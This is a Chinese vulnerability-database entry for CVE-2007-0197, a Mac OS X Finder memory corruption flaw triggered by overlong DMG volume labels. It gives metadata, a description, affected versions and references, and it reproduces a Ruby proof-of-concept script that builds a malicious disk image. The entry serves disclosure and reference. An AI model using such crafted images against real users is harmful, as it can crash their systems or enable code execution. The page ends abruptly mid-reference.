Apple Mac OS X Finder DMG卷标内存破坏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111977 漏洞类型 资源管理错误
发布时间 2007-01-09 更新时间 2007-02-20
CVE编号 CVE-2007-0197 CNNVD-ID CNNVD-200701-133
漏洞平台 OSX CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3110
https://www.securityfocus.com/bid/21980
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-133
|漏洞详情
AppleMacOSX是苹果家族机器所使用的操作系统。AppleMacOSX所捆绑的Finder程序在处理超长的卷标名时存在内存破坏漏洞,远程攻击者可能利用此漏洞控制用户机器。如果攻击者能够诱骗用户加载包含有大于255字节卷标名称的DMG镜像的话,就会触发这个漏洞,导致拒绝服务或执行任意指令。
|漏洞EXP
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#

require 'fileutils'
require 'zlib'

hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""

255.times do
  volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end

FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"

puts "++ reading #{dmgname}..."
dmg_stream = File.read(dmgname)
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."

# milw0rm.com [2007-01-09]
|受影响的产品
Apple Mac OS X Server 10.4.8 Apple Mac OS X 10.4.8
|参考资料

来源:US-CERT
名称:TA07-047A
链接:http://www.us-cert.gov/cas/techalerts/TA07-047A.html
来源:US-CERT
名称:VU#240880
链接:http://www.kb.cert.org/vuls/id/240880
来源:XF
名称:macos-finder-dos(31410)
链接:http://xforce.iss.net/xforce/xfdb/31410
来源:SECTRACK
名称:1017662
链接:http://www.securitytracker.com/id?1017662
来源:BID
名称:21980
链接:http://www.securityfocus.com/bid/21980
来源:BUGTRAQ
名称:20070111DMA[2007-0107a]OmniWebJavascriptAlertFormatStringVulnerabiityandDMA[2007-0109a]AppleFinderDiskImageVolumeLabelOverflow/DoS
链接:http://www.securityfocus.com/archive/1/archive/1/456578/100/0/threaded
来源:OSVDB
名称:32714
链接:http://www.osvdb.org/32714
来源:VUPEN
名称:ADV-2007-0140
链接:http://www.frsirt.com/english/advisories/2007/0140
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2007-0109a%5D.txt
来源:SECUNIA
名称:24198
链接:http://secunia.com/advisories/24198
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-09-01-2007.html
来源:APPLE
名称:APPLE-SA-2007-02-15
链接:http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
来源:do